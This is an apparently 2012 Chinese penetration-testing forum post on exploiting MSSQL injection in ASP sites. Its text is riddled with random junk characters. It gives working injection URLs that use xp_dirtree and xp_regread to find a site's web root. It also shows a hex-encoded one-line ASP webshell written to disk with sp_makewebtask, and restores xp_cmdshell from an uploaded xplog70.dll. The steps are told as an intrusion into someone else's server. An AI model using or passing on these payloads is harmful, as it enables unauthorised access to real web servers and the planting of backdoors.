找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2796|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'9 `0 h: ?1 p# ]: V% c7 A
假设我们在test里有两个文件夹test1和test2在test1里又有test32 o8 l! c! n" ?
结果显示
- x- {) L- V* e7 U9 I# e' z1 Y, f
+ H; h2 K8 r/ N/ Usubdirectory depth+ r" j7 T/ V& t, f- S( a2 O
test1 1
. S' J9 e- e0 z" m2 M6 c0 }& z* Dtest3 2: G* ?: ], p) |2 S; M
test2 1/ _- {' ^( j& O3 w# J2 I

; y) V1 f: [" W2 G" X. f7 o哈哈发现没有那个depth就是目录的级数
5 `; y: M8 c$ H* ^, fok了,知道怎么办了吧
- k4 M" N0 a8 Q( h. F- Y+ k; ^6 k9 c$ x, c8 K9 L
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
* g4 y- j: \9 q" b/ B: ehttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
* t( y8 v* F. ?/ ]+ H, a  G1 whttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
0 L1 p9 k7 Y! L6 W) ~3 Y6 _4 T+ E
# m4 d& D7 \+ v4 w$ K' K# h! q& e: ^只要加上id=1,就是第一级目录 。
5 U2 C2 m. \& M  W% _3 k" f: u2 ]5 U$ f) _' @

3 \( r" T% i& R通过注册表读网站路径:
' s7 g+ J$ ^5 l7 \7 h- |) D% }, e1 h! J6 i9 }# Z: b
1.;create table [dbo].[cyfd] ([gyfd][char](255));+ e8 J+ d* W* S
: y( G- S$ u: L/ }) w  Y* C" P2 [9 f3 W. d1 b
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
/ J2 ]5 N( X7 B8 \id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--; m( h) M4 k" F# J
% B) |8 H! c# s
3.and 1=(select count(*) from 临时表 where 临时字段名>1)0 d2 }: ~" h, z, r. P) l; R9 @
and 1=(select count(*) from cyfd where gyfd > 1) 9 Z8 ?4 U8 j6 S
这样IE报错,就把刚才插进去的Web路径的值报出来了1 i2 s" j0 I  K4 O/ ~

" ^& Y/ x' g" H* j4.drop table cyfd;-- 删除临时表
: v0 ^* A+ t. n: C
2 Z8 E8 R, v+ X: f; c0 v获得webshell方法:& C: o; R, j$ P
1.create table cmd (a image)-- \**cmd是创建的临时表2 R# M8 S7 ~* F0 F% t
2 g/ W3 u" @; k
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话% h9 l2 Y- ^. [; W  t3 n. p! {

' c2 I+ b8 Y; j4 P2 M3 K! g9 z& ?: Y* q
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'# x) f2 S* }: x8 |$ e
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'- l. U. y# O0 H- g
5 U+ ?8 d2 E- M$ n7 k4 y0 x. {' |$ ^
4.drop table cmd;-- 删除cmd临时表
  C$ H) d! W8 O3 K! W
# V$ g" }/ @5 p2 M& p0 t  n恢复xp_cmdshell方法之一:0 X4 X/ H) B$ J8 I( P8 V8 _% j
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:& M3 x- O) u) l. f8 `9 l- {$ X
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
/ o9 j3 z! F3 k+ n3 H- ?恢复,支持绝对路径的恢复哦。:): H' l: o! P# i9 u: @
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表